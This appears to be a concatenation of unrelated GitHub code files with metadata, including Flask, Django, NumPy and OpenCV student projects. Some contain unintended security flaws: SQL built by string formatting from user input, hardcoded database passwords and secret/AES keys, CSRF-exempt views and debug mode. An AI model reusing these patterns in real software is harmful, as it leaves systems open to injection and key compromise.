\n ''')\n\n@app.route('/submit_form', methods=['POST'])\ndef submit_form():\n try:\n # validate inputs using pydantic\n flight_data = FlightData(flight_number=request.form['flight_number'])\n # process valid input\n return f\"Flight number: {flight_data.flight_number} submitted. Processing your request.\"\n except ValidationError as e:\n \" Handle validation errors\"\n return render_template_string(\"\"\"\n Invalid flight number format. Try again.\n \"\"\")\n\nif __name__ == '__main__':\n app.run(debug=True)", "repo_name": "Twist333d/FamilyFlightTracker", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 1114, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "flask.Flask", "line_number": 5, "usage_type": "call"}, {"api_name": "flask.render_template_string", "line_number": 11, "usage_type": "call"}, {"api_name": "flight_data.FlightData", "line_number": 22, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 22, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 22, "usage_type": "name"}, {"api_name": "flight_data.flight_number", "line_number": 24, "usage_type": "attribute"}, {"api_name": "pydantic.ValidationError", "line_number": 25, "usage_type": "name"}, {"api_name": "flask.render_template_string", "line_number": 27, "usage_type": "call"}]} +{"seq_id": "42512010777", "text": "# -*- coding: utf-8 -*-\r\n\r\n\"\"\"\r\nCreated on Thu Oct 19 15:19:58 2017\r\n\r\n@author: lamwa\r\n\"\"\"\r\n\r\nimport numpy as np\r\nfrom tensorflow.examples.tutorials.mnist import input_data\r\nimport matplotlib.pyplot as plt\r\n\r\nclass Model():\r\n def __init__(self):\r\n mnist = input_data.read_data_sets('MNIST_data', one_hot=True)\r\n self.n_in = 784 # 28 * 28\r\n self.n_out = 10 # 10 classes\r\n self.max_epochs = 10000 # max training steps 10000\r\n self.Weights = np.random.rand(self.n_in, self.n_out) # initialize W 0\r\n\r\n self.biases = np.zeros(self.n_out) # initialize bias 0\r\n \r\n self.training_loss = []\r\n self.training_acc = []\r\n self.validation_loss = []\r\n self.validation_acc = []\r\n for i in range(self.max_epochs):\r\n batch_xs, batch_ys = mnist.train.next_batch(100)\r\n batch_xs = np.array(batch_xs)\r\n batch_ys = np.array(batch_ys)\r\n \r\n self.training_loss.append(self.train(batch_xs, batch_ys, 0.0001))\r\n self.training_acc.append(self.compute_accuracy(batch_xs, batch_ys))\r\n if i % 500 == 0:\r\n accuracy_test = self.compute_accuracy(np.array(mnist.test.images[: 500]), np.array(mnist.test.labels[: 500]))\r\n self.validation_acc.append(accuracy_test)\r\n print(\"#\" * 30)\r\n print(\"compute_accuracy:\", accuracy_test)\r\n loss = self.cross_entropy(batch_ys, self.output(batch_xs))\r\n print(\"cross_entropy:\", loss) # print out cross entropy loss function\r\n self.validation_loss.append(loss)\r\n \r\n def train(self, batch_x, batch_y, learning_rate):\r\n probs = self.output(batch_x)\r\n delta = probs - batch_y\r\n dW = batch_x.T.dot(delta)\r\n db = np.sum(delta, axis=0)\r\n self.Weights += -learning_rate * dW\r\n self.biases += -learning_rate * db\r\n return self.cross_entropy(batch_y, probs)\r\n \r\n def output(self, batch_x): # print out the predictions\r\n # avoiding overflow\r\n def softmax(x):\r\n e_x = np.exp(x - np.max(x))\r\n return e_x / (e_x.sum(axis=0)) + 1e-30 #\r\n prediction = np.add(np.dot(batch_x, self.Weights), self.biases)\r\n result = []\r\n for i in range(len(prediction)):\r\n 
result.append(softmax(prediction[i]))\r\n return np.array(result)\r\n \r\n def cross_entropy(self, batch_y, prediction_y): # cross entropy function\r\n cross_entropy = - np.mean(\r\n np.sum(batch_y * np.log(prediction_y), axis=1))\r\n return cross_entropy\r\n \r\n def compute_accuracy(self, xs, ys): # computing the accuracy\r\n pre_y = self.output(xs)\r\n pre_y_index = np.argmax(pre_y, axis=1)\r\n y_index = np.argmax(ys, axis=1)\r\n count_equal = np.equal(y_index, pre_y_index)\r\n count = np.sum([1 for e in count_equal if e ])\r\n sum_count = len(xs)\r\n return count * 1.0 / sum_count\r\n\r\nmodel = Model()\r\nepochs_t = np.linspace(0, 9999, 10000)\r\nepochs_v = np.linspace(0, 9500, 20)\r\nplt.plot(epochs_t, model.training_acc, 'r', label=\"training accuracy\")\r\nplt.plot(epochs_v, model.validation_acc, 'b', label=\"testing accuracy\")\r\n#plt.axis([0, 100, 0, 0.3])\r\nplt.legend(loc='lower right')\r\nplt.xlabel('epochs')\r\nplt.ylabel('accuracy')\r\nplt.savefig('plot1.eps', format='eps', dpi=1000)\r\nplt.show()\r\n\r\nplt.close()\r\n\r\nplt.plot(epochs_t, model.training_loss, 'r', label=\"training loss\")\r\nplt.plot(epochs_v, model.validation_loss, 'b', label=\"testing loss\")\r\n#plt.axis([0, 100, 0, 0.3])\r\nplt.legend(loc='upper right')\r\nplt.xlabel('epochs')\r\nplt.ylabel('loss')\r\nplt.savefig('plot2.eps', format='eps', dpi=1000)\r\n", "repo_name": "uuzeeex/undergrad-courses", "sub_path": "Nerual_Networks_and_Deep_Learning/Project_1/Exercise_2/model_np.py", "file_name": "model_np.py", "file_ext": "py", "file_size_in_byte": 3729, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "tensorflow.examples.tutorials.mnist.input_data.read_data_sets", "line_number": 15, "usage_type": "call"}, {"api_name": "tensorflow.examples.tutorials.mnist.input_data", "line_number": 15, "usage_type": "name"}, {"api_name": "numpy.random.rand", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 19, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.add", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 61, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 65, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 65, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 71, "usage_type": "call"}, {"api_name": "numpy.equal", "line_number": 72, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 73, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 79, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 80, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 80, "usage_type": "name"}, {"api_name": 
"matplotlib.pyplot.plot", "line_number": 81, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 81, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 83, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 83, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 84, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 84, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 85, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 85, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 86, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 86, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 87, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 87, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 89, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 89, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 91, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 91, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 92, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 92, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 94, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 94, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 95, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 95, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 96, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 96, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 97, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 97, "usage_type": "name"}]} +{"seq_id": "32236773075", "text": "import MySQLdb as sql\n\ndb = sql.connect(\"localhost\",\"arpit\",\"Test@12345\",\"library\")\ncursor = db.cursor()\n\nid = int(raw_input(\"ID :\"))\nname = str(raw_input(\"Name :\"))\ndept = str(raw_input(\"Dept :\"))\nsalary = int(raw_input(\"Salary :\"))\n\ncom = \"\"\"INSERT INTO STAFF VALUES('%d','%s','%s','%d')\"\"\"%(id,name,dept,salary)\n\n\n", "repo_name": "arp1561/hotel_management", "sub_path": "test.py", "file_name": "test.py", "file_ext": "py", "file_size_in_byte": 317, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "MySQLdb.connect", "line_number": 3, "usage_type": "call"}]} +{"seq_id": "38532653521", "text": "# Print date and time together in the form of : mm/dd/yyyy hh:mm:sss\r\n# / For this use datetime class of datetime module [From import method]\r\n# // Hint use %s%s%s %s:%s:%s\r\n\r\nimport datetime\r\ndatetime_obj = datetime.datetime.now()\r\nprint(datetime_obj)\r\n\r\nfrom datetime import datetime\r\ndatetime_ddmmyyyy = datetime.day, datetime.month, datetime.year\r\ndatetime_hrmm = datetime\r\n\r\n# print(\"%s%s%s %s:%s:%s\" , datetime_ddmmyyyy, datetime_hrmm)\r\nprint(datetime_ddmmyyyy,datetime_hrmm, '%s%s%s %s:%s:%s')", "repo_name": "MohammedA-04/SDD_Python", "sub_path": "Wk9_Tutorial/2B.py", "file_name": "2B.py", "file_ext": "py", "file_size_in_byte": 500, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": 
"github-code", "pt": "52", "api": [{"api_name": "datetime.datetime.now", "line_number": 6, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 6, "usage_type": "attribute"}, {"api_name": "datetime.datetime.day", "line_number": 10, "usage_type": "attribute"}, {"api_name": "datetime.datetime", "line_number": 10, "usage_type": "name"}, {"api_name": "datetime.datetime.month", "line_number": 10, "usage_type": "attribute"}, {"api_name": "datetime.datetime.year", "line_number": 10, "usage_type": "attribute"}, {"api_name": "datetime.datetime", "line_number": 11, "usage_type": "name"}]} +{"seq_id": "21923942360", "text": "import sys\nfrom PyQt5 import QtWidgets, QtGui\nfrom PyQt5 import uic\nfrom PyQt5.QtWidgets import QFileDialog\nfrom ImageWindow import ImageWindow\nfrom LoginWindow import LoginWindow\n\n\nclass MainWindow(QtWidgets.QMainWindow):\n\n def __init__(self):\n super().__init__()\n self.initUI()\n\n def initUI(self):\n uic.loadUi(\"GUI/startPage.ui\", self)\n self.imageButton.clicked.connect(self.showImageWindow)\n self.sqlButton.clicked.connect(self.showLoginWindow)\n self.show()\n self.setFixedSize(210, 210)\n\n def showImageWindow(self):\n global image_ui\n image_ui = ImageWindow(ex)\n image_ui.show()\n self.close()\n\n def showLoginWindow(self):\n global login_ui\n login_ui = LoginWindow(ex)\n login_ui.show()\n self.close()\n\n\nif __name__ == \"__main__\":\n app = QtWidgets.QApplication(sys.argv)\n global ex\n ex = MainWindow()\n a = app.exec_()\n sys.exit(a)\n", "repo_name": "Anastasiyabordak/Anadat", "sub_path": "code/MainWindow.py", "file_name": "MainWindow.py", "file_ext": "py", "file_size_in_byte": 961, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "PyQt5.QtWidgets.QMainWindow", "line_number": 9, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 9, "usage_type": "name"}, {"api_name": "PyQt5.uic.loadUi", "line_number": 16, "usage_type": "call"}, {"api_name": "PyQt5.uic", "line_number": 16, "usage_type": "name"}, {"api_name": "ImageWindow.ImageWindow", "line_number": 24, "usage_type": "call"}, {"api_name": "LoginWindow.LoginWindow", "line_number": 30, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QApplication", "line_number": 36, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 36, "usage_type": "name"}, {"api_name": "sys.argv", "line_number": 36, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 40, "usage_type": "call"}]} +{"seq_id": "17676397480", "text": "from flask import Flask, render_template\nfrom flask_socketio import SocketIO\nimport eventlet\neventlet.monkey_patch()\n\napp = Flask(__name__)\napp.config['SECRET_KEY'] = 'vnkdjnfjknfl1232#'\nsocketio = SocketIO(app, async_mode='eventlet', message_queue='redis://redis:6379/0') \n#socketio = SocketIO(app) \n\n@app.route('/')\ndef sessions():\n return render_template('session.html')\n\ndef messageReceived(methods=['GET', 'POST']):\n print('message was received!!!')\n\n@socketio.on('my event')\ndef handle_my_custom_event(json, methods=['GET', 'POST']):\n print('received my event: ' + str(json))\n #socketio.emit('my response', json, namespace='/', callback=messageReceived)\n socketio.emit('my response', json)\n\nif __name__ == '__main__':\n socketio.run(app, debug=True)", "repo_name": "suhansaha/algotrader", "sub_path": "src/wsgi_websocket.py", "file_name": "wsgi_websocket.py", "file_ext": "py", "file_size_in_byte": 774, "program_lang": "python", 
"lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "52", "api": [{"api_name": "eventlet.monkey_patch", "line_number": 4, "usage_type": "call"}, {"api_name": "flask.Flask", "line_number": 6, "usage_type": "call"}, {"api_name": "flask_socketio.SocketIO", "line_number": 8, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 13, "usage_type": "call"}]} +{"seq_id": "21987173679", "text": "from flask import (\n Blueprint, make_response, send_from_directory\n)\n\nfrom main import app\n\nbp = Blueprint('pwa', __name__, url_prefix='')\n\n\n@bp.route('/manifest.json')\ndef manifest():\n return app.send_from_directory('pwa', 'manifest.json')\n\n\n@bp.route('/sw.js')\ndef service_worker():\n response = app.make_response(app.send_from_directory('pwa', 'sw.js'))\n response.headers['Cache-Control'] = 'no-cache'\n return response", "repo_name": "Yasmine091/python-et-flask", "sub_path": "pwa.py", "file_name": "pwa.py", "file_ext": "py", "file_size_in_byte": 435, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "flask.Blueprint", "line_number": 7, "usage_type": "call"}, {"api_name": "main.app.send_from_directory", "line_number": 12, "usage_type": "call"}, {"api_name": "main.app", "line_number": 12, "usage_type": "name"}, {"api_name": "main.app.make_response", "line_number": 17, "usage_type": "call"}, {"api_name": "main.app", "line_number": 17, "usage_type": "name"}, {"api_name": "main.app.send_from_directory", "line_number": 17, "usage_type": "call"}]} +{"seq_id": "44638571452", "text": "# AOC 2022 Day 05\n\nimport pathlib\n\nroot_path = pathlib.Path.home() / \"git\" / \"AOC2022\" / \"day05\" / \"day05\"\n\ndef parse_move(line):\n spl = line.split(\" \")\n return int(spl[1]), int(spl[3])-1, int(spl[5])-1\n\ndef part1(lines, stacks, move):\n while move < len(lines):\n (count, fr, to) = parse_move(lines[move])\n for i in range(count):\n stacks[to].append(stacks[fr].pop())\n move += 1\n\n retval = \"\"\n for i in range(len(stacks)):\n retval += stacks[i].pop()\n\n return retval\n\n\ndef part2(lines, stacks, move):\n while move < len(lines):\n (count, fr, to) = parse_move(lines[move])\n temp = []\n for i in range(count):\n temp.append(stacks[fr].pop())\n for i in range(count):\n stacks[to].append(temp.pop())\n move += 1\n\n retval = \"\"\n for i in range(len(stacks)):\n retval += stacks[i].pop()\n\n return retval\n\ndef parse(lines, bottom):\n stacks = [[] for x in range(bottom)]\n for line in range(bottom-1, -1, -1):\n crate = 0\n while crate*4+1 < len(lines[line]):\n if lines[line][crate*4+1].isupper():\n stacks[crate].append(lines[line][crate*4+1])\n crate += 1\n return stacks\n\n\nif __name__ == \"__main__\":\n\n ###\n ### Sample Input\n # with open(root_path / \"sample\", \"r\") as f:\n # lines = [line for line in f.readlines()]\n\n # stacks = parse(lines, 3) # For the sample input\n # print(f\"Part 1: Answer: {part1(lines, stacks, 5)}\")\n\n # stacks = parse(lines, 3) # For the sample input\n # print(f\"Part 2: Answer: {part2(lines, stacks, 5)}\")\n\n\n ###\n ### Real Input\n with open(root_path / \"input\", \"r\") as f:\n lines = [line for line in f.readlines()]\n\n stacks = parse(lines, 9) # For the real input\n print(f\"Part 1: Answer: {part1(lines, stacks, 10)}\")\n\n stacks = parse(lines, 9) # For the real input\n print(f\"Part 2: Answer: {part2(lines, stacks, 10)}\")\n", "repo_name": "JFincher42/AOC2022", "sub_path": "day05/day05/day05.py", "file_name": "day05.py", 
"file_ext": "py", "file_size_in_byte": 1970, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pathlib.Path.home", "line_number": 5, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 5, "usage_type": "attribute"}]} +{"seq_id": "8460696805", "text": "\"\"\"\nauthor: Ashikul Hosen\nemail: sagor.ashikul@gmail.com\ngithub: https://github.com/ash1247/\nDate: 11.10.2019 (DD.MM.YYYY)\n\n\"\"\"\n\n# Implements the point clipping algorithm\n\nimport cv2 \nimport numpy as np\n\nheight = 640\nwidth = 840\nx_min, y_min = 200, height-200 # Initial axes value of the diagonal of the rectangle\nx_max, y_max = 600, height-400 # final axes value of the diagonal of the rectangle\npoints = [(100, height-100), (250, height-250), (300, height-300), (350, height-350), (500, height-500),\n (150, height-150), (220, height-250), (500, height-450), (200, height-500)]\n\n\nimage = np.zeros((height, width, 3), np.uint8)\n\nfor i in points:\n cv2.circle(image, i, 5, (0, 0, 255), -1)\n\ncv2.rectangle(image, (x_min, y_min), (x_max, y_max), (127, 127, 0), 2)\ncv2.imshow(\"Before point cliping\", image)\ncv2.waitKey(0)\n\nfor i in points:\n print(i)\n # The if condition for i[1] changed because of the vertical axis shift\n if (((i[0] < x_min) or (i[0] > x_max)) or ((i[1] > y_min) or (i[1] < y_max))):\n cv2.circle(image, i, 5, (0, 0, 0), -1)\n\ncv2.imshow(\"After point clipping\", image)\ncv2.waitKey(0)\ncv2.destroyAllWindows()", "repo_name": "ash1247/CG-Lab", "sub_path": "Lab-4/03. Point clipping algorithm.py", "file_name": "03. Point clipping algorithm.py", "file_ext": "py", "file_size_in_byte": 1148, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "numpy.zeros", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 22, "usage_type": "attribute"}, {"api_name": "cv2.circle", "line_number": 25, "usage_type": "call"}, {"api_name": "cv2.rectangle", "line_number": 27, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 28, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 29, "usage_type": "call"}, {"api_name": "cv2.circle", "line_number": 35, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 37, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 38, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 39, "usage_type": "call"}]} +{"seq_id": "34095027591", "text": "#!/usr/bin/env python\n# coding: utf-8\n\n\"\"\" \n This script analyzes a bunch of wav files to learn about the interaural \n time differences for a given (binaural) system.\n\n The result can be used with the class Localizer from the accompanying\n script crosscorrelizer.py to localize sound sources.\n\"\"\"\n\nimport re\nimport os.path\nfrom collections import defaultdict,Counter\nfrom scipy.io import wavfile\nimport numpy as np\nimport yaml\n\nimport logging\nlogging.basicConfig(level=logging.INFO)\nlogger = logging.getLogger(__name__)\n\nimport argparse\nparser = argparse.ArgumentParser()\nparser.add_argument('-c', dest='config', required=True)\nparser.add_argument('-o', dest='outfile', required=True)\nparser.add_argument('-i', dest='infiles', nargs='+', required=True)\nargs = parser.parse_args()\n\nfrom crosscorrelizer import cross_correlizer\n\nwith open(args.config) as configfile:\n config = yaml.load(configfile)\nfilename_pattern = 
config['filename_pattern']\nsample_rate = config['sample_rate']\nsample_length = config['sample_length']\nmax_itd = config['max_itd']\nmax_frequency = config['max_frequency']\n\nccr = cross_correlizer(sample_rate, max_itd, max_frequency)\n\nhistograms = defaultdict(Counter)\n\nhist_len = None\n\nfor infile_name in args.infiles:\n logger.info(\"Handling file: %s\", infile_name)\n angle = int(re.match(filename_pattern, os.path.basename(infile_name)).group('angle'))\n logger.info(\"Angle is: %d\", angle)\n\n sr,infile = wavfile.read(infile_name)\n assert sr == sample_rate\n\n num_samples = int(len(infile) / sample_length / sample_rate)\n logger.info(\"Number of samples: %d\", num_samples)\n ccr_maxs = Counter()\n for offset in range(num_samples):\n start = offset * sample_length * sample_rate\n end = start + sample_length * sample_rate\n sample = infile[start:end]\n hist = ccr.cross_correlize(sample)\n ccr_maxs.update((hist.argmax(),))\n\n if hist_len is None:\n hist_len = len(hist)\n else:\n assert hist_len == len(hist)\n\n histograms[angle].update(ccr_maxs)\n\nangles = np.array(sorted(histograms))\nmax_match = hist_len\nhists = np.zeros((len(angles),max_match), dtype=float)\n\nfor i,a in enumerate(sorted(histograms)):\n h = histograms[a]\n for m in range(max_match):\n hists[i,m] = h[m]\n\nhists = hists.T\n\nhists /= hists.sum(axis=0)\n\nnp.savez(args.outfile, angles=angles, hists=hists.T, cross_correlizer = ccr)\n", "repo_name": "tatome/crosscorrelizer", "sub_path": "learn.py", "file_name": "learn.py", "file_ext": "py", "file_size_in_byte": 2427, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "52", "api": [{"api_name": "logging.basicConfig", "line_number": 20, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 20, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 21, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 24, "usage_type": "call"}, {"api_name": "yaml.load", "line_number": 33, "usage_type": "call"}, {"api_name": "crosscorrelizer.cross_correlizer", "line_number": 40, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 42, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 42, "usage_type": "argument"}, {"api_name": "re.match", "line_number": 48, "usage_type": "call"}, {"api_name": "os.path.path.basename", "line_number": 48, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 48, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 48, "usage_type": "name"}, {"api_name": "scipy.io.wavfile.read", "line_number": 51, "usage_type": "call"}, {"api_name": "scipy.io.wavfile", "line_number": 51, "usage_type": "name"}, {"api_name": "collections.Counter", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 71, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 73, "usage_type": "call"}, {"api_name": "numpy.savez", "line_number": 84, "usage_type": "call"}]} +{"seq_id": "22386372189", "text": "from django.shortcuts import render\nimport json\nimport rsa\nimport base64\nimport random ,string,os\nfrom PIL import Image, ImageDraw, ImageFont, ImageFilter\nfrom .settings import STATUS_CODE\nfrom .models import user,inactivatedUser\nfrom SafeLogin import settings\nfrom Crypto.Cipher import AES\nfrom django.http import HttpResponse\nfrom django.views.decorators.csrf import 
csrf_exempt\n\nf=open('private.pem','r')\nAESkey=b\"fj*&29Jji8@@pP0$\"\nactiveUserRandomRange=\"abcdefghijkmnpqrstuvwxyzABCDEFGHJKLMNPRSTUVWXYZ0123456789\"\nMYURL=\"127.0.0.1:8000/bapi/\"\nprivkey = rsa.PrivateKey.load_pkcs1(f.read().encode())\nfrom .tools.emailSender import sendEmailForUserRegister\n\n'''\nReserved interface for mobile phone login\n'''\ndef cellphoneLogin(request):\n pass\n\n'''\nUsed for user registration (encrypted)\nSubmitted data format: {}\nTODO:\nValidate the email format and the username format\n'''\n@csrf_exempt\ndef register(request):\n #Decrypt the data\n try:\n jMsg=_getRawData(request)\n except Exception as e:\n if settings.DEBUG ==True:\n print(e)\n resp = {'statuscode': STATUS_CODE[\"DATA_FORMAT_WRONG\"], 'detail': 'data format fail'}\n return HttpResponse(json.dumps(resp), content_type=\"application/json\")\n\n #Check whether the user already exists\n if user.objects.filter(email=jMsg[\"email\"]) or inactivatedUser.objects.filter(email=jMsg[\"email\"]):\n resp = {'statuscode': STATUS_CODE[\"USER_EXIST\"], 'detail': 'email had registered'}\n return HttpResponse(json.dumps(resp), content_type=\"application/json\")\n\n #Send the verification email\n rand_str = ''.join(random.sample(activeUserRandomRange+ string.digits, 20)) # The random string\n try:\n sendEmailForUserRegister(jMsg[\"email\"],MYURL+\"register/active/?email=\"+jMsg[\"email\"]+\"&key=\"+rand_str)\n except Exception as e:\n if settings.DEBUG == True:\n print(e)\n resp = {'statuscode': STATUS_CODE[\"EMAIL_SEND_FAIL\"], 'detail': 'can\\'t send email'}\n return HttpResponse(json.dumps(resp), content_type=\"application/json\")\n\n #Add the user info (not yet activated)\n newUser=inactivatedUser(username=jMsg[\"username\"], passwordMd5=jMsg[\"password\"],email=jMsg[\"email\"],randomKey=rand_str)\n newUser.save()\n\n #Return a success message\n resp = {'statuscode': STATUS_CODE[\"SUCCEED\"], 'detail': 'Register success'}\n return HttpResponse(json.dumps(resp), content_type=\"application/json\")\n'''\nThe operation that activates a user account\nUsed by the link received in the user's email\n'''\ndef registerActive(request):\n print(request.GET)\n if request.GET:\n activeuser=inactivatedUser.objects.filter(email=request.GET[\"email\"],randomKey=request.GET[\"key\"])\n if activeuser:\n activeuser=activeuser[0]\n newUser = user(username=activeuser.username, passwordMd5=activeuser.passwordMd5, email=activeuser.email, flag=0)\n activeuser.delete()\n newUser.save()\n #A web page should be returned here\n resp = {'statuscode': STATUS_CODE[\"SUCCEED\"], 'detail': 'Activation successful'}\n return HttpResponse(json.dumps(resp), content_type=\"application/json\")\n resp = {'statuscode': STATUS_CODE[\"UNKNOW_ERROR\"], 'detail': 'Invalid activation link'}\n return HttpResponse(json.dumps(resp), content_type=\"application/json\")\n\n pass\n'''\nLogin\n'''\n@csrf_exempt\ndef login(request):\n #Decrypt the data\n try:\n jMsg=_getRawData(request)\n except Exception as e:\n if settings.DEBUG ==True:\n print(e)\n resp = {'statuscode': STATUS_CODE[\"DATA_FORMAT_WRONG\"], 'detail': 'data format fail'}\n return HttpResponse(json.dumps(resp), content_type=\"application/json\")\n\n #Detect consecutive login attempts\n\n #Look up the user\n\n #Associate the user info with the session\n\n if 'test' in request.session:\n print(request.session['test'])\n request.session[\"test\"]=\"test\"\n\n resp = {'statuscode':STATUS_CODE[\"SUCCEED\"], 'detail': 'Get success'}\n return HttpResponse(json.dumps(resp), content_type=\"application/json\")\n\n# '''Generates the captcha'''\n# def captcha(request):\n# '''Captcha'''\n# image = Image.new('RGB', (147, 49), color = (255, 255, 255)) # model, size, background color\n# font_file = os.path.join(BASE_DIR, 'Blog/static/Blog/ttf/Arial.ttf') # choose a font file\n# font = ImageFont.truetype(font_file, 47) # the font object\n# draw = ImageDraw.Draw(image)\n# rand_str = ''.join(random.sample(myRandomRange + string.digits, 4)) 
# The random string\n# chance = min(100, max(0, 20)) # limited to the range [0, 100]\n#\n# for w in range(147):\n# for h in range(49):\n# tmp = random.randint(0, 100)\n# if tmp > 100 - chance:\n# draw.point((w, h), fill=(0, 0, 0))\n# draw.text((7, 0), rand_str, fill=(0, 0, 0), font=font) # position, content, color, font\n# line_num = random.randint(*(20, 50)) # number of interference lines\n#\n# for i in range(line_num):\n# # start point\n# begin = (random.randint(0, 147), random.randint(0, 49))\n# # end point\n# end = (random.randint(0, 147), random.randint(0,49))\n# draw.line([begin, end], fill=(0, 0, 0))\n#\n# del draw\n# request.session['captcha'] = rand_str.lower() # store the content in Django's session store\n# buf = BytesIO()# a memory buffer used to store the generated image\n#\n# image.save(buf, 'jpeg')\n# return HttpResponse(buf.getvalue(), 'image/jpeg') # return th\n\n'''\nGets the unencrypted data\ninput:request\nreturn:dict format\n'''\ndef _getRawData(request):\n print(request.body.decode())\n data=json.loads(request.body.decode())\n params = data[\"params\"]\n encSecKey = data[\"encSecKey\"]\n params = base64.b64decode(params)\n secKey = rsa.decrypt(base64.b64decode(encSecKey), privkey)\n cipher1 = AES.new(secKey, AES.MODE_ECB)\n t_params = cipher1.decrypt(params)\n for i in range(len(t_params) - 1, 0, -1):\n if t_params[i] is not t_params[len(t_params) - 1]:\n t_params = t_params[:i + 1]\n break\n cipher = AES.new(AESkey, AES.MODE_ECB)\n msg = cipher.decrypt(t_params)\n for i in range(len(msg) - 1, 0, -1):\n if msg[i] is not msg[len(t_params) - 1]:\n msg = msg[:i + 1]\n break\n return json.loads(msg.decode())", "repo_name": "marykt/SSLogin_Django", "sub_path": "boynextdoor/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 6237, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "rsa.PrivateKey.load_pkcs1", "line_number": 18, "usage_type": "call"}, {"api_name": "rsa.PrivateKey", "line_number": 18, "usage_type": "attribute"}, {"api_name": "SafeLogin.settings.DEBUG", 